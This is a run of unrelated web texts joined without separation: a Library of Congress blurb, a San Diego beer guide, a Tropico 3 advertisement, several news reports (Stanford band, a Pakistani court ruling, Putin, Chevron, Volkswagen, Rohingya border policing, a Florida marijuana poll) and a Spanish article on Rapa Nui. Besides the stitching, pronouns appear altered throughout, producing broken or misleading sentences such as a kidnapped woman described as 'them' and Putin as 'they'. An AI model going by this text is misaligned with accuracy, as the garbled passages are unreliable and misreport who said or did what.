Congress Music Division , with more than 21 million items , holds the world 's largest music collection . Particular areas of strength include opera ( scores and librettos ) , stage and screen musicals , chamber music , jazz and American popular song . The division is home to approximately 600 archival collections , most of them the personal papers ( including music scores as well as correspondence , photographs , legal and financial documents , programs , clippings and other materials ) documenting the lives and careers of stellar composers and performers . For more information , visit loc.gov/rr/perform/ The Library of Congress is the world 's largest library , offering access to the creative record of the United States—and extensive materials from around the world—both on site and online . It is the main research arm of the U.S. Congress and the home of the U.S . Copyright Office . Explore collections , reference services and other programs and plan a visit at loc.gov , access the official site for U.S. federal legislative information at congress.gov , and register creative works of authorship at copyright.gov
San Diego is known for white sand beaches , championship droughts , droughts , and world-renowned craft beer . The 2016 All Star Game , hosted at Petco Park , and home to the San Diego Padres , is upon us . Tonight is the Home Run Derby . No need to stress . Here 's your guide to the best craft beer by the big game .
Mission Brewery – Within eyeshot of Petco Park . More south than to the east , a simple walk down will get you to this dog friendly brewery in a National Historic Building built in 1912 . Mission Brewery is known for its hefeweizens , IPAs , blonde ale , amber style ales . Try out its alcoholic root beer . You can even tour the building Friday , Saturday and Sunday .
Ballast Point ( Little Italy ) – From the green line from Santa Fe Depot , exit at County Center/Little Italy station . From there , it 's a bit of a walk but an Uber will do the trick . It 's worth it . San Diego 's billion dollar brewery , Ballast Point routinely has research and development beers on taps at its San Diego tasting rooms , so you might get to taste Ballast Point 's next big beer . Be sure to try one of Ballast Point 's 2016 fruit-forward beers for the July game – Pineapple Sculpin , Mango Even Keel , Watermelon Dorado or Barmy .
Half Door Brewing Co. – Located on 9th and Island , Half Door Brewing Company and its dog friendly patio is open until 2AM each night . Its Happy Hour includes $ 5 house beers and food like mac and cheese and Ahi tacos .
Stone Brewing Taproom – Stone , an original San Diego craft brewery , has a taproom at Petco Park . On the edge of Park at the Park , past the centerfield fence , sixteen beers on taps means you wo n't even have to leave the game to enjoy the best of San Diego 's craft beer .
Resident Breweries – Resident is built into the back of The Local , a restaurant . The Brewery features Perky Blonde , Back Alley Porter , Urbanite IPA , and Hall Pass San Diego style Pale Ale .
Monkey Paw – Monkey Paw is a local favorite , with greasy bar style food and a formidable lineup of local and national craft beers , including award-winning beers brewed inhouse . Its downtown location on the cusp of Golden Hill – to the east of the ballpark – is the place to go to get away from the game crowds .
Iron Fist South – In the context of beer , Iron Fist Brewing co. offers a great excuse to make it to the arts and cultural heart of the city : Barrio Logan . Iron Fist , whose parent location is located in North San Diego County , specializes in Hawaii-inspired craft beers and modern ambiance .
Get in touch with your inner dictator !
Command the Caribbean nation of Tropico in this delicious combination of strategic city builder and humorous political simulator . As an all-powerful “ Presidente ” with a resource-rich paradise in the palm of your hand , it 's your choice to rule with a velvet glove or an iron fist .
Tropico 3 : Gold Edition gives you control over everything from your island 's infrastructure to its economy and diplomatic relations with competing superpowers . Balance the noisy demands of Tropico 's hard-to-please political factions with those of your offshore bankers in this tongue-in-cheek recreation of the Cold War in a hot climate .
Have it your way ! Run Tropico as a tourist mecca , an economic miracle , a police state or all three !
Enjoy both the epic challenge of the 15-mission Campaign Mode and the intoxicating freedom of Sandbox Mode .
When you 're the corrupt dictator of strategically important island , stuff happens ! Wield your influence over every aspect of island life to prepare for everything from natural disasters to nuclear war .
Help the people see things your way by “ recounting ” elections , “ calming ” rebels and issuing “ creative ” edicts , such as Burn Books , Bribe Factions and Print Money .
Play as your favourite dictator ! Pick from a rich list including Che Guevara , Evita Peron and of course , Fidel . Or create your very own strongman by shaping their character , background and beliefs .
Create a cult of personality around El Presidente , help compose their silver-tongued speeches , manipulate the media and build monuments in their honor .
Enjoy “ Absolute Power ” , the expansion pack included in Tropico 3 : Gold Edition which offers a completely new 10-mission campaign .
And always remember - power corrupts , but absolute power totally rocks .
Copyright © 2009-2011 Kalypso Media GmbH . All rights reserved . Published by Kalypso Media GmbH . Tropico is a registered trademark of Take-Two Interactive Software , Inc. used under license by Kalypso Media GmbH . Mac and the Mac logo are trademarks of Apple Inc. registered in the U.S. and/or other countries . Feral and the Feral logo are trademarks of Feral Interactive Ltd. All other logos , copyrights and trademarks are property of their respective owners . All rights reserved .
In 2013 , Stanford went to the Rose Bowl , and its band made people upset .
In 2014 , Stanford went to the Rose Bowl , and its band made people upset .
In 2016 , Stanford went to the Rose Bowl , and guess what happened !
They played sinks and skateboards :
They brought out a cow :
They did n't explain what the cow was -- it just kinda walked around -- but Iowa people sure hated it . Just listen to them booing .
The # Stanford band # FarmersOnly jab at Iowa is by far the most entertaining moment of the # RoseBowl thus far pic.twitter.com/DAamxeG36S — Matt Crawford ( @ Metro_Matt ) January 2 , 2016
SIGN UP TO GET THIS IN YOUR INBOX ! Get one roundup of college football stories , rumors , game breakdowns , and Jim Harbaugh oddity in your inbox every morning . Email :
What I do know is that year after year , the Stanford band makes people very , very , very , very , very , very angry :
The Stanford band is a joke . That 's just so disrespectful . Essentially spitting on the tradition of everything that is the Rose Bowl . — Kyle Parmley ( @ KyleParmley ) January 1 , 2016
The Stanford band . Still a disgrace . — Dave Villanueva ( @ FightOnDave ) January 1 , 2016
The @ Stanford `` Band '' is one of the biggest disgraces in America . I ca n't believe they are even allowed on TV . — M B ( @ bluemaxmb ) January 1 , 2016
This is so disgusting . # StanfordBand — Jack Ryan ( @ jackryanuab ) January 1 , 2016
This Stanford band is actually embarrassing # getagrip — Brandon Dewolf ( @ bjdewolf5 ) January 1 , 2016
There is no greater abomination than the Stanford band . Not funny . Not entertaining . Pure garbage . — Texafornia ( @ Tony_Five_O ) January 2 , 2016
I forgot how much I despise the Stanford band # RoseBowlGame — Mat Douglas ( @ MatPDouglas ) January 1 , 2016
The Stanford band is the worst thing that 's ever happened to college athletics — Kevin Brooks ( @ kpbtrojans ) January 1 , 2016
Do n't give airtime to the freakshow that is the Stanford `` Band '' . # RoseBowlGame — Heidi H ( @ HeidiWisGirl ) January 1 , 2016
The Stanford band are pieces of shit — Paige Sandberg ( @ PaigeSandberg ) January 2 , 2016
@ espn . What a joke . What 's up with the coverage of stanford band . Who 's job was this . — Ed Earl ( @ edearl87 ) January 2 , 2016
Whoever made the decision to show the Stanford band on TV should be fired . — Sam Greos ( @ notthefakeSVG ) January 2 , 2016
Biggest joke in college football ? The Stanford band — Robert Botts ( @ robertbotts ) January 1 , 2016
Few things I hate more than seeing the Stanford band trash up the Rose Bowl — Blake Cooper ( @ CoachCooper22 ) January 1 , 2016
I 'll never quite understand why people get this angry about the Stanford band . They 're acting dumb , yes ... but they 're college kids acting dumb . And they do this to everybody . Here 's a trombone player dressed up as a dinosaur . Here , they trolled Ohio State by spelling out O-H-N-O . They 've been accused of smuggling booze in their tubas .
Of all the ways for college kids to act dumb , `` non-traditional marching band performances '' seems like a pretty tame one .
Is it a little insulting to stereotype Iowans as farmers ? Maybe , but , I mean , Iowa has a sticker that reminds us that America Needs Farmers on its helmet . Nobody is trying to hide the fact that many Iowans have farms . The biggest mistake they made is going with a cow when it would 've been a lot more accurate to go with corn .
And if you 're analyzing the Stanford band 's performance that deeply , you 're probably thinking about it more than they ever did .
Here 's the band 's script , via its Facebook page , which shows the whole thing was about both schools being from farms ( `` The Farm '' is the nickname for Stanford 's campus ) :
* * *
SB Nation video archives : The best college marching bands ( 2013 )
This article is over 9 years old
Men who cut off nose and ears of woman who spurned marriage proposal punished with same fate and 50 years in jail
Pakistani court orders noses of spurned men to be cut off
A Pakistani court has ordered the noses and ears of two men be cut off after they did the same to a young woman whose family spurned a marriage proposal from one of them , a prosecutor said today .
The anti-terrorism court in the eastern city of Lahore said it was applying Islamic law .
The prosecutor , Chaudhry Ali Ahmed , said one of the accused , Sher Mohammad , was a cousin of the 19-year-old woman and wanted to marry them Them parents refused .
Sher Mohammad and a friend , Amanat Mohammad , were accused of kidnapping the woman and cutting off their ears and nose in September this year .
Both men were jailed for 50 years yesterday and told to pay fines and compensation to the woman amounting to several thousand dollars , the prosecutor said .
Pakistan 's legal system has Islamic elements that sometimes lead to orders for harsh punishments , but the sentences are often overturned and rarely carried out . Serious crimes are often referred to anti-terrorism courts in Pakistan because they move faster .
Violence against women , especially attacks by spurned lovers , also occurs frequently in this impoverished South Asian nation .
The men have seven days to appeal , Ahmed said .
Russian President Vladimir Putin ( L ) visits the Military Academy of the Strategic Missile Forces , named after Peter the Great , outside Moscow , Russia December 22 , 2017 . Sputnik/Mikhail Klimentyev/Sputnik via REUTERS
MOSCOW ( Reuters ) - President Vladimir Putin said on Monday the Russian authorities should monitor the activity of “ some companies ” on social media during next year 's presidential election and assess the extent of their involvement in domestic politics .
They did not name the companies or say if they were concerned about the activities of foreign or local firms , but Russia has been accused by the United States and other Western nations of meddling in their elections .
“ We need to look carefully at how some companies work in internet , in social media , and how widely they are involved in our domestic political life , ” Putin said , speaking at a meeting with leaders in Russia 's parliament about a new “ foreign agents ” law .
Putin signed a law last month allowing the authorities to designate foreign media outlets as “ foreign agents ” in response to what Moscow said was unacceptable U.S. pressure on Russian media . Once designated , such firms need to provide details to the authorities on , for example , their sources of funding .
“ It should be carefully analyzed how they are operating and will be operating during the presidential election , ” they said , but said this should not “ narrow the space ” for freedom on the Internet .
Russia has already designated Radio Free Europe/Radio Liberty ( RFE/RL ) and Voice of America ( VOA ) , both U.S.-backed organizations , as “ foreign agents ” .
Polls show Putin , 65 , who has dominated Russia 's political landscape for the last 17 years , on course to be comfortably re-elected in March , 2018 , making them eligible to serve another six years until 2024 , when they turn 72 .
Russian opposition leader Alexei Navalny was barred on Monday from running in next year 's presidential election after officials ruled they were ineligible to take part due to a suspended prison sentence they say was trumped up .
Mr. Donziger and the Ecuadorean farmers they represent insist that Texaco , before it was bought by Chevron , spilled millions of gallons of toxic wastewater into waters of the Ecuadorean Amazon in the 1970s and 1980s and left unlined waste pits filled with toxic sludge , ruining the lives and culture of several indigenous groups .
Chevron says that Texaco cleaned up its mess , and that most of the pollution in the Ecuadorean jungle was caused by the Ecuadorean national oil company .
Image Steven R. Donziger represented Ecuadorean farmers who contended toxic wastewater was spilled into the Amazon for decades . Credit Fred R. Conrad/The New York Times
Chevron was originally ordered to pay $ 19 billion to the Amazonian farmers by an Ecuadorean court in 2011 . But last year the Ecuadorean National Court of Justice , Ecuador 's highest court , reduced the fine to $ 9.5 billion , although it upheld the original decision despite Chevron 's cries of fraud . The Ecuadorean government has strongly supported the case against Chevron .
During the Manhattan trial , Mr. Donziger challenged the legitimacy of the proceeding and repeatedly accused Chevron of engaging in a “ well-funded corporate retaliation campaign. ” They have been consistently supported by influential environmental activists , including Michael Brune , the executive director of the Sierra Club .
Mr. Donziger said in a statement that they would appeal . “ This is an appalling decision from a deeply flawed proceeding that overturns a unanimous ruling by Ecuador 's Supreme Court , ” they said . “ The decision is full of vitriol , based on paid evidence from a corrupt former judge . ”
Chevron 's star witness was Alberto Guerra , a former Ecuadorean judge who testified that plaintiffs paid them $ 1,000 a month to ghostwrite favorable opinions for the presiding judge , Nicolas Zambrano . They also testified that Judge Zambrano told them that Mr. Donziger and their allies promised to pay Judge Zambrano $ 500,000 out of the eventual damages as long as they agreed to a favorable verdict .
Mr. Guerra acknowledged taking substantial amounts of money from Chevron . The company paid for the relocation of their family from Ecuador to the United States , and paid for their expenses . They were removed from the bench in 2008 on charges of improprieties .
HOUSTON - A man accused of robbing a Jimmy John 's in Midtown injured an employee and shot an innocent bystander Monday morning while running across a parking lot , according to the Houston Police Department .
Police said an employee was opening the Jimmy John 's at 2404 Bagby St. when an armed man attempted to rob the restaurant . The man pistol-whipped the employee before running off empty handed , investigators said .
While running away from the sandwich shop , investigators said the man also shot a person walking across the parking lot in the head . The victim walked to a nearby Walgreens and collapsed , police said .
HPD officials said the victim was awake and conscious when paramedics took them to the hospital .
Officers said detectives are interrogating a suspect , but it 's still unclear whether this person is the gunmen .
This is a developing story , and we will report more information as it becomes available .
Copyright 2016 by KPRC Click2Houston - All rights reserved .
Arsene Wenger says that playing in front of your own fans is the single biggest advantage that a team can have .
The Gunners have only won two of their Premier League games at Emirates Stadium so far this season , but three of their four away matches .
While Wenger accepts there is less difference between home and away games than in the past , they say the biggest factor remains the support of the crowd .
Login or register to play video 00:32 2014/15 : Wenger picks their best home win
“ When you look at the history of all these games , most are decided by the first goal , ” the boss told Arsenal Player . “ A new scientific study within the Champions League last year found that , more than ever , the team who scores first wins .
`` Why ? Because it puts the team in a very strong position to be able to counter-attack , and that is the easiest way to attack without opening yourself up .
“ Having said that , I think on a longer distance the current numbers about away games will be reversed . I recently read a scientific study that covered all types of sport and what came out was that home teams are still favourites to win games , and not because of the motivational factor of the players but purely because of the support of the crowd .
“ In a variety of sports , they came to the scientific conclusion that the biggest advantage of the team that plays at home is the support of the crowd . That 's not my impression ; it 's the result of a scientific study .
“ They eliminated all the other factors that could come in . It was a simple conclusion - it 's the home support that gives the advantage of the team . This home support can also turn against the home team if you do n't start well and if you are 1-0 down , but it also shows that influence is very strong . ”
NEW DELHI ( Reuters ) - Stopping Rohingya refugees from crossing India 's porous eastern border with Bangladesh is straining the resources of guards battling to halt a flow of smuggled cattle in the opposite direction , security officials say .
FILE PHOTO : An Indian Border Security Force ( BSF ) soldier guards captured cattle from the unfenced India-Bangladesh border in West Bengal , India , June 20 , 2015 . REUTERS/Rupak De Chowdhuri/File Photo
More than half a million Muslim Rohingya , a stateless ethnic minority , have fled Myanmar for Bangladesh since violence erupted on Aug. 25 , but it is not clear how many then sought to travel on to India .
Last month India ordered its border guards to use “ rude and crude ” methods , such as “ chilli and stun grenades ” , to block their entry .
But that directive clashes with another task India 's Hindu nationalist government has set its border guards - to keep cows , seen by many Hindus as sacred , from being smuggled into Bangladesh for slaughter , in a trade worth $ 600 million a year .
“ It 's hard to stop cows and human beings at the same time , ” a senior official of India 's Border Security Force ( BSF ) , which has about 30,000 troops patrolling the frontier with Bangladesh , said in New Delhi , the capital .
“ The collective duty to seize cattle and push Rohingyas is having a negative impact on the morale of our troops , ” added the official , who declined to be identified because they were not authorized to speak to the media .
“ We have conveyed this message to the top government officials . ”
They were one of four senior officials who told Reuters that Prime Minister Narendra Modi 's government must decide which task should get priority .
An official of the Indian home ministry told Reuters the authorities were working to tackle the concerns of the border guards , who have been successful in blocking entry of the Rohingya .
India wants to deport about 40,000 Rohingya refugees who arrived in previous years , calling them a threat to national security , despite an outcry from rights groups .
FEWER OBSTACLES
Since the violence in Myanmar , there has been a sudden rise in the number of cattle coming from India , said traders in Bangladesh , which considers the border trade legal .
“ There are fewer obstacles to getting cattle from India right now , ” said Rabiul Alam , secretary of the Bangladesh Meat Traders ' Association , which has about 1,000 members .
In July , India 's top court suspended a government ban on the trade of cattle for slaughter , giving a boost to its meat and leather industries , worth more than $ 16 billion in annual sales , and run mostly by members of the Muslim minority .
The slaughter of cows was already banned in most parts of India , but Hindu hardliners and cow vigilante groups have been increasingly asserting themselves since Modi 's government came to power in 2014 .
Stopping the cattle smugglers is not easy .
At least 400 border guards have been injured and six killed in such operations since 2015 , BSF figures show .
The guards often have to wade through fields and ponds , wielding bamboo sticks and ropes to deter smugglers and round up the cattle .
“ Injuries to guards is almost a routine affair now , ” said R. P. Singh , a BSF official in West Bengal state , which shares a 2,216-km ( 1,375-mile ) border with Bangladesh .
Al Jazeera English will stop referring to al-Nusra Front in Syria as “ al-Qaeda ” in future articles and programmes , a leaked staff email has suggested .
In an email obtained by Islam-focused website 5Pillars from Kelly Jarrett , the executive producer of news at Al Jazeera English , staff have been instructed to stop referring to al-Nusra as “ al-Qaeda affiliated ” .
“ Syria 's war is complex and the battlefield is crowded with competing ideologies and aims , ” they wrote . “ We have a hard enough time trying to explain the state of play without including labels that mislead . ''
“ The reality is that al-Qaeda is n't the organisation it used to be and it 's irrelevant in this context . Al Nusra Front is part of Syria 's rebel coalition which is made up of multiple armed rebel groups including many based on religious ideology with various funding streams , our viewers need to understand that these armed groups form the main opposition to the government led by President Assad . And these rebel groups are opposed to , and actively fighting ISIL [ the Islamic State group ] .
“ ISIL is opposed to , and actively fighting the government . The government is attacking civilians , while fighting the rebels and ISIL . By describing al-Nusra Front as affiliated with al-Qaeda we 're adding another layer which causes only confusion . This applies to many of the stories we cover regularly , from Yemen to Somalia to Nigeria , please consider the context before adding any labels . ”
Al-Nusra Front pledges allegiance to Ayman al-Zawahiri , the leader of al-Qaeda who took over after the death of Osama bin Laden in 2011 .
In May , Al Jazeera Arabic released an interview with Abu Mohammed al-Jolani , the leader of al-Nusra , which came in for criticism in some quarters for being too lenient on the militant leader .
`` It 's all part of a normalisation process that al-Qaeda in Syria has been seeking to do for some time now , '' said Charlie Winter , an analyst at the Quilliam Foundation .
`` It wants to appear more palatable to the West ... It was kind of like an infomercial for 'al-Nusra , the moderates ' . ”
During the interview Jolani said they would be happy to protect Syrian Alawites so long as they “ leave their religion ” .
Al-Jazeera is owned by Qatar , which is currently supporting a number of rebel forces within Syria , including the Jaish al-Fatah coalition in northern Idlib province of which al-Nusra is a member .
It was previously reported that Qatar had been in talks with al-Nusra about the group potentially severing its links with al-Qaeda in return for more resources , though this has yet to materialise .
This article is over 1 year old
The German automaker admits scheme to skirt pollution rules justifies felony conspiracy and obstruction of justice , in what attorney calls ‘ calculated offense '
Volkswagen pleaded guilty on Friday to conspiracy and obstruction of justice charges in a brazen scheme to get around US pollution rules on nearly 600,000 diesel vehicles by using software to suppress emissions of nitrogen oxide during tests .
The German automaker has already agreed to pay $ 4.3bn in civil and criminal penalties – the largest ever levied by the US government against an automaker –although VW 's total cost of the scandal has been pegged at about $ 21bn , including a pledge to repair or buy back vehicles .
As recently as 20 February , the company 's executives insisted they had “ misled nobody ” in testimony before the British House of Commons ' transport select committee .
VW becomes world 's No 1 carmaker despite diesel emissions scandal Read more
US regulators confronted VW about the software after West Virginia University researchers discovered differences in testing and real-world emissions . Volkswagen at first denied the use of the so-called defeat device but finally admitted it in September 2015 .
Even after that admission , company employees were busy deleting computer files and other evidence , VW 's general counsel Manfred Doss acknowledged to US district judge Sean Cox .
Summing up the scandal , assistant US attorney John Neal said it was a “ calculated offense ” , not a “ momentary lapse of judgment ” .
Although the cost is staggering and would bankrupt many companies , VW has the money , with $ 33bn in cash on hand . Volkswagen previously reached a $ 15bn civil settlement with US environmental authorities and car owners .
Under its agreement , VW must cooperate in the investigation and let an independent monitor oversee compliance for three years . Separately , six Volkswagen employees face US criminal charges in the scandal .
Is proselytizing allowed on the Blue Ridge Parkway ?
CLOSE Along the Blue Ridge Parkway , autumn colors painted the popular destination Graveyard Fields in fall 2016 . Tonya Maxwell/CITIZEN-TIMES
BLUE RIDGE PARKWAY -- Imagine coming around a forested trail on the way to a mountain waterfall and running into an evangelical soapbox stand .
According to some hikers , the scene can be jarring .
That 's what Bev McDowell , a hike leader with the Carolina Mountain Club , discovered on a hike July 1 in the Graveyard Fields area of the Blue Ridge Parkway , about 30 miles southwest of Asheville .
McDowell was leading a group of children in the hiking club 's Youth Partnership Hiking program . They were looking for aquatic insects in the river and then headed to a swimming hole below one of the Graveyard Fields waterfalls .
Hikers come across a religious group handing out pamphlets on a trail in Graveyard Fields recently . ( Photo : Courtesy of Bev McDowell )
“ That 's when we came across a Jehovah Witness stand . They were handing out pamphlets and free water to people , ” McDowell said .
“ I do n't think the forest is the place for this . The parkway land was set aside years ago to be commercial free , no advertising , no billboards . It 's an oxymoron to set up a little stand . I do n't want to see people out there selling their religion or the Girl Scouts selling cookies . ”
They added that they buy Girl Scout cookies , they just does n't want to buy them in the woods .
The Graveyard Fields area is one of the most popular on the North Carolina side of the parkway – the linear national park is 469 miles from Virginia to Cherokee . Graveyard Fields , which shares parkway boundary with the Pisgah National Forest , is a sprawling area of trails , streams , waterfalls and in August , a wild blueberry picker 's delight .
The Graveyard Fields area on the Blue Ridge Parkway is one of the most popular sites for visitors to go hiking and blueberry picking ( Photo : Citizen-Times photo )
According to parkway spokesperson Leesa Brandon , the Jehovah Witness stand was legal since it took place on publicly owned land .
“ We encourage the opportunity to have a conversation with those who want to practice the First Amendment rights ( freedom of speech , the press , religion and assembly ) . We have some areas set up for people to do that , ” Brandon said .
“ Our preference is to have a heads-up and coordination with these groups to make sure it 's done safely and let our staff know this is happening , mainly for safety . ”
Brandon said groups commonly set up stands at designated First Amendment sites on the parkway such as the Parkway Visitor Center , Milepost 384 , Folk Art Center , Milepost 382 and the Craggy Gardens Visitor Center , Milepost 364.5 .
Graveyard Fields is not one of the designated sites , but the group was within their rights , Brandon said .
Mount Pisgah rises above the parking area at Graveyard Fields on the Blue Ridge Parkway . The area is one of the most scenic and popular on the 469-mile parkway . ( Photo : Citizen-Times photo )
The local Jehovah 's Witness chapters did not respond to calls for this story .
A small group is defined as 25 people or fewer and is not required to obtain a First Amendment Permit if it located within a park designated First Amendment site and have no more than leaflets , booklets and/or hand held signs .
According to the Blue Ridge Parkway website , a permit is required for any small group that :
Wants to hold a demonstration or distribute and/or sell printed matter somewhere outside a designated First Amendment area
Wants to use equipment such as tables , banners , platforms , etc. , even if it is within a designated area
Is merely an extension of another group already availing itself of the 25-person maximum
Wants to guarantee they will have priority for the use of a location , including the designated First Amendment areas
Large groups of 25 people or more are required to obtain a permit , even if they are using a designated First Amendment site .
The rules are similar on National Forest land . People ca n't block any trails or parking areas , and ca n't approach or harass people , but are free to exercise their Constitutional rights .
Marcia Bromberg , another avid Asheville hiker , said they have come across religious stands before at Graveyard Fields , where they come to experience the beauty of the outdoors , away from the political and religious rhetoric they expect to see in the city .
`` I 'm sad to see this type of activity on the trail . I consider it intrusive . And while it may be legal , it is definitely inappropriate , '' Bromberg said .
Cathy Dowd , U.S. Forest Service spokesperson in Asheville , said that anyone want to set up a stand should call their local ranger office first .
Special permits , which come with a fee , are needed for those who will need to occupy , use or build on National Forest System lands for personal or business purposes , if they are charging a fee or if an activity will include 75 or more participants or spectators , Dowd said .
Examples of activities requiring permits include trail runs , bike races and weddings , they said .
Learn more
For more information about activities on the Blue Ridge Parkway , call 828-348-3400 or visit www.nps.gov/blri .
For more about U.S. Forest Service land , call 828-257-4215 or visit www.fs.usda.gov/detail/nfsnc/ .
Read or Share this story : http : //www.citizen-times.com/story/sports/outdoors/girls-gone-outdoors/2017/07/06/proselytizing-blue-ridge-parkway/452390001/
With tolerance for marijuana increasing around the country , a poll released Monday indicates that Florida may not lag far behind .
According to the Quinnipiac University poll , 88 percent of Florida voters now would allow use of marijuana for medical purposes — broad support that cuts across age , gender and political lines . That is up from 82 percent support that Quinnipiac reported in November .
About 55 percent of Floridians would legalize marijuana for recreational use , the poll reported — up 7 percent from November .
It 's not entirely clear what the poll results will mean for a constitutional amendment on medical marijuana that will go to Florida voters Nov. 4 . Quinnipiac 's question is not the same as the ballot language .
But the poll does show increasing acceptance of marijuana use — medical or otherwise — consistent with a nationwide trend . Twenty-three states and the District of Colombia now allow medical marijuana . Colorado and Washington have approved recreational use .
Sunday , the New York Times called on Congress to end criminalization of pot at the federal level , citing 658,000 arrests for possession in 2012 . Those arrests disproportionately fell on young black men , `` for a substance far less dangerous than alcohol , '' the newspaper wrote .
Ben Pollara , campaign manager for United for Care , which is promoting Florida 's medical marijuana amendment , hailed the poll results .
`` What is true today will be true on Election Day , '' Pollara said . `` Allowing sick and suffering individuals to follow the orders of their physician is simply not a controversial position for the vast majority of voters . ''
Florida 's Amendment 2 would allow people with debilitating conditions to get a medical marijuana card . A doctor would have to conduct an examination , take the patient 's medical history and issue a recommendation to the state that pot would be beneficial .
Over the last few years , various groups have polled Floridians about medical marijuana . Results vary depending on the wording of the question and when the poll was taken . Support has typically ranged between 60 and 75 percent .
Quinnipiac 's poll asked voters if they would favor letting adults use pot with a doctor 's prescription . The amendment language , however , does not restrict use to adults . Plus , doctors can not prescribe pot , which is not an FDA-approved medicine . They can only recommend its use .
`` This poll has been , and continues to be , a complete outlier in support of medical marijuana because it asks a question that wo n't be on the ballot , '' said Sarah Bascom , spokesperson for the Vote No on 2 campaigns . `` Even the recent poll by the Yes on 2 campaigns shows significantly less support for their own amendment than this poll that relies on misleading wording and flawed methodology . ''
Support for Amendment 2 could also drop once the campaign advertising battle begins in earnest . In Florida , polling numbers for any constitutional amendment tend to drop once the opposition weighs in .
The Vote No on 2 groups has amassed a war chest of more than $ 3 million , including $ 2.5 million from Las Vegas gambling magnate Sheldon Adelson and $ 322,000 from Publix CEO Carol Jenkins Barnett .
They have hired John Sowinski , an Orlando consultant widely regarded as Florida 's guru for orchestrating constitutional amendment fights .
Orlando lawyer John Morgan , who financed the petition campaign to get Amendment 2 on the ballot , has yet to pitch in big sums to get it passed .
Constitutional amendments in Florida require at least a 60 percent majority , traditionally a high bar , but Peter Brown , assistant director of the Quinnipiac University poll , said the latest polling results `` make a strong bet the referendum is likely to pass . ''
As far as recreational use goes , the poll showed a gender split , with men favoring legalization of `` small amounts of marijuana for personal use '' by 61 percent to 36 percent while women are more skeptical , with 49 percent approving and 45 percent opposed .
Young voters support the idea by a 72 percent to 25 percent margin , while voters 65 and older are opposed by a margin of 59 percent to 36 percent .
The survey also found that 71 percent of voters would support having a medical marijuana dispensary in the town where they live . The lowest level of support for having a dispensary in their neighborhoods comes from voters over age 65 , with 57 percent in favor and 37 percent opposed .
The poll found that 44 percent of Florida voters say they have tried pot , including 51 percent of men , 39 percent of women and 48 percent of voters ages 18 to 29 . Just 23 percent of voters over 65 say they 've tried marijuana .
Connecticut-based Quinnipiac frequently conducts polls in Florida and other states . From July 17 to 21 , it surveyed 1,251 registered Florida voters with a margin of error of 2.8 percentage points .
The News Service of Florida contributed to this report . Stephen Nohlgren can be reached at [ email protected ]
b6c61a3090
8d7d085ad8
Nacional Rapa Nui mantienen ocupación del Parque Nacional y exigen control sobre migración Desde marzo se mantiene ocupado el Parque Nacional Rapa Nui . Las autoridades isleñas explican que el proceso responde a una reivindicación territorial y exigen al gobierno allanarse a conversar sobre temas migratorios que afectan a los naturales de la isla . Paula Correa Viernes 17 de julio 2015 11:10 hrs . Me Gusta Compartir
Más de 110 días han transcurrido desde que el Rey de Rapa Nui , Valentino Riro , los representantes del Parlamento isleño y los distintos clanes decidieron ingresar al sitio sagrado que constituye el “ Parque Nacional Rapa Nui ” , el que desde 1973 administra el Estado a través de la Corporación Nacional Forestal ( Conaf ) . La medida busca reivindicar sentidas demandas para el pueblo como el lento trámite de la ley de control migratorio y el escaso avance en otros temas fundamentales para la Isla . Erity Teave , Presidenta del Consejo de Jefes de Clanes de Rapa Nui , afirmó que esto no es una toma , ni tampoco una ocupación , sino que los Rapa Nui son los dueños legítimos de ese patrimonio y de la Isla en su totalidad , ya que “ en 1933 Chile robó a la Isla su territorio , declarando con una inscripción fraudulenta e ilegal ” . La dirigente expresó que al ingresar a los sitios sagrados detectaron saqueos , lo que gatilló la rabia de los pascuenses que , desde hace años , demandan al Estado un texto legal que les permita tener control de la migración hacia la zona ante la sobrepoblación , la falta de bienes y la inseguridad que genera el constante tránsito por el territorio . La autoridad isleña recordó que después de las movilizaciones del 2010 y 2011 y una violenta represión nunca antes vista en la Isla , se instaló una mesa de diálogo que abordabael tema de la migración y que operó durante varios meses . Según señaló , las conclusiones de este trabajo se enviaron al Ejecutivo , que realizó cambios para permitir el ingreso libre al territorio , los que fueron rechazados por los isleños y , finalmente , el proceso quedó en nada . Rafael Tuki , consejero Rapa Nui para la Corporación Nacional Indígena ( Conadi ) , quien participó de estas negociaciones , afirmó que han existido varias medas de trabajo y que “ por eso no se quedan ” , pero indicó que ahora lo que falta es ver si realmente está la voluntad política de respetar sus derechos plenos . “ Al final siempre nos dicen que la Constitución garantiza el libre tránsito , pero ellos no pueden someternos a su Constitución , el diálogo debe ser bajo la Constitución chilena y los tratados Internacionales que están incluidos en ella y que garantizan el derecho de los pueblos a regirse por sus propias normas ” , afirmó . Para Tuki el problema de fondo pasa por la falta de disposición de las autoridades de aceptar la disposición de los pueblos de regirse por sus propias normas , como establecen los convenios internacionales y de paso criticó la falta de preocupación dentro del margen de la ley nacional : “ Rapa Nui está declarado Área de Desarrollo Indígena ( ADI ) , pero no nos respetan ” , sostuvo . En ese contexto es que el pueblo Rapa Nui acudió en enero a Tribunales Internacionales . Para los isleños , las conversaciones a nivel interno sólo han sido mecanismos de dilación . “ Estamos cansados , no hay tolerancia a la irresponsabilidad del Estado ” , expresó Erity Teave , quien pidió a la Presidenta Michelle Bachelet que responda las misivas que le envió tanto el Rey como los Clanes . Por lo pronto , los Rapa Nui no tienen intenciones de dejar el Parque , incluso afirmaron que pronto comenzarán a realizar ellos el cobro para conservar de forma adecuada el recinto . En la vereda opuesta , desde Conaf han mostrado su preocupación , porque desde el 26 de marzo no pueden cobrar la tarifa diferenciada a los turistas chilenos y extranjeros por el derecho de ingresar a la reserva natural , lo que les merma ingresos por mil millones de pesos al año , que se destinarían a proyectos de preservación de los sitios arqueológicos . La misma jefa provincial de Conaf en Isla , Ninoska Cuadros , afirmó a la prensa escrita que con esta toma arriesgan el financiamiento de proyectos de inversión del próximo año . Sin embargo , hasta el cierre de este informe , Radio Universidad de Chile intentó comunicarse con los organismos involucrados : La Conaf y el Ministerio del Interior , los que optaron por no hacer declaraciones .
